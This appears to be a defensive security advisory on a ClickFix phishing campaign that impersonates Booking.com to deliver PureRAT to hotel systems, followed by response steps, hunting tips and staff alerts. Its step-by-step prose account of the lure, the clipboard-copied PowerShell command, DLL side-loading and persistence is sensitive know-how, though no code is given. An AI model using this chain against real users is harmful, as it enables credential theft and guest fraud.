ClickFix Phishing Campaign Targets Hotels with PureRAT — What Hospitality IT Teams Must Do Now

An extensive phishing campaign targeting the hospitality industry is using highly convincing ClickFix-style pages to harvest credentials and deliver PureRAT (zgRAT) to hotel systems. Operators impersonate booking platforms like Booking.com, lure hotel administrators with spear-phishing emails sent from compromised accounts, and push victims through a redirection chain that culminates in a malicious “captcha” page. The end result: stolen management credentials, hijacked booking accounts, fraudulent customer messages, and full remote-access capability on infected machines.

This campaign is notable for its scale, operational sophistication, and the commoditization of the attack chain — from credential harvesting and log checking to malware distribution and resale of valid Booking/Expedia/Airbnb logs on criminal marketplaces.

How the attack works — step by step

1. Initial lure: attackers use a compromised email account to send targeted messages to hotel staff that appear to come from Booking.com or similar services.
2. Redirection to ClickFix page: victims are redirected through a chain to a fake reCAPTCHA or “security check” page (ClickFix style) designed to appear legitimate.
3. Clipboard hijack and HTTP downgrade: JavaScript on the page checks the browser context and forces an HTTP redirect; it often auto-copies a PowerShell command into the user’s clipboard.
4. Execution by victim: the page instructs the victim to paste and run the copied command in Run/Terminal, which then probes the host and downloads a ZIP containing a malicious binary.
5. Malware deployment and persistence: the binary installs via DLL side‑loading, establishes persistence (Run registry key), and ultimately loads PureRAT.
6. Post‑compromise activity: attackers harvest credentials, capture keystrokes and screens, proxy traffic, and exfiltrate data or use accounts for fraud. They may also contact guests with fraudulent “verification” requests to steal payment details.

Why this campaign is particularly dangerous for hotels

• Direct access to booking platforms: admin credentials allow attackers to manipulate reservations, issue fraudulent refunds, or harvest guest PII and payment data.
• Credential resale economy: stolen Booking/Expedia logs are validated and sold via dedicated forums and Telegram bots, making clean‑ups permanent and profitable for attackers.
• High fraud ROI: successful compromises allow attackers to perform targeted guest fraud (phishing via WhatsApp/email), which monetizes quickly compared to many enterprise intrusions.
• Social engineering sophistication: ClickFix pages now include videos, timers, OS-adjusted instructions, and clipboard hijacking — all designed to shorten user scrutiny and increase success rates.
• Malware capability: PureRAT provides full remote control, keylogging, audio/video capture, file exfiltration, and proxying — enabling deep fraud, persistence, and further compromise.

Immediate actions for hotel IT and security teams

1. Block and quarantine: identify and block the phishing sender address and associated domains; quarantine affected inboxes and scan for other compromised senders.
2. Educate staff immediately: issue an urgent advisory to administrators and front‑desk staff warning about fake Booking.com/Expedia emails, instructing them never to paste or execute code from web pages.
3. Disable risky workflows: temporarily disable in‑browser “security check” workflows that direct staff to run local commands; require verification via official vendor portals.
4. Rotate credentials and sessions: reset credentials for Booking, Expedia, and property-management system (PMS) accounts; revoke active sessions and reissue API keys where applicable.
5. Scan and remediate endpoints: run EDR/AV scans, hunt for persistence artifacts (Run registry keys, DLL side‑loading traces), and isolate or reimage infected hosts.
6. Harden backups and recovery: ensure backups are offline or immutable to prevent deletion and enable rapid restoration if hosts are wiped or encrypted.
7. Monitor for outbound traffic: watch for connections to unknown C2 hosts, and for lateral movement indicators such as remote desktop sessions from unusual internal systems.

Detection and hunting tips

• Look for PowerShell or cURL executions launched from user contexts soon after clicking links; especially commands that download and unzip payloads.
• Hunt for new Run registry entries or DLLs loaded from nonstandard directories.
• Monitor DNS for domain lookups tied to credential-checking services, Telegram bot domains, or suspicious log‑checker proxies.
• Correlate bookings platform logins with unusual IPs, geolocations, or proxy-based access patterns used by log-checker services.
• Watch customer-facing channels (email, WhatsApp) for phishing messages that match stolen booking templates and timestamps following admin account access.

Practical mitigations and longer-term controls

• Enforce multi-factor authentication and session governance for all booking/extranet accounts; require hardware or FIDO2 tokens for admin users.
• Harden admin workstations: apply application allow‑listing, restrict the ability to execute PowerShell or terminal commands from untrusted sites, and use dedicated hardened jump boxes for account management.
• Block clipboard-autocomplete workflows: educate users and use endpoint controls to prevent or alert on clipboard‑based command execution.
• Implement least privilege and network segmentation for systems that manage bookings and payment processing; isolate the vaults and management tools.
• Employ anti-phishing controls: DMARC/DKIM/SPF enforcement, advanced email threat protection, and URL sandboxing to reduce malicious link reachability.
• Subscribe to threat feeds and marketplace monitoring: watch for credentials or logs connected to your brand in criminal marketplaces and Telegram channels.
• Regularly test social-engineering resilience with targeted phishing simulations tailored to booking workflows.

Communications templates (short)

• Ops alert (to IT/security): “Immediate action: phishing campaign impersonating Booking.com—block domains, force password resets for extranet/admin accounts, and scan endpoints for persistence. Do not run any copied commands.”
• Staff notice (to hotel admins): “If you received an email asking you to run a command or verify bookings via a link, do not follow it. Report the email to IT and change your Booking/Expedia password immediately.”
• Guest advisory (if customer data potentially exposed): “We are investigating a security incident affecting administrative systems. If you receive suspicious booking verification messages, do not provide payment details and contact our official support line.”

Strategic recommendations for hospitality CISOs

• Treat booking platforms as crown‑jewel applications: enforce stronger authentication, dedicated admin workflows, and stricter logging.
• Build partnerships with major OTAs (Booking, Expedia) to establish rapid takedown and credential-swap workflows when compromises occur.
• Invest in EDR visibility and rapid forensic capability on front‑desk and admin endpoints that have direct access to extranet systems.
• Contractually require third‑party integrators and franchisees to meet minimum security baselines (MFA, endpoint protection, segmented networks).
• Create playbooks that cover both administrator account compromise and guest-facing phishing fraud, including legal and PR steps for customer communication.

Final thought

The ClickFix–PureRAT campaign is a stark reminder that social engineering remains the most efficient path into sensitive systems — especially where attackers can tie admin access directly to financial gain. For the hospitality industry, the stakes are high: stolen extranet accounts translate directly into revenue‑and‑trust losses. The defense is straightforward but operationally demanding: reduce human risk through training and hardened workflows, lock down admin endpoints, and treat booking-platform credentials as top-tier secrets.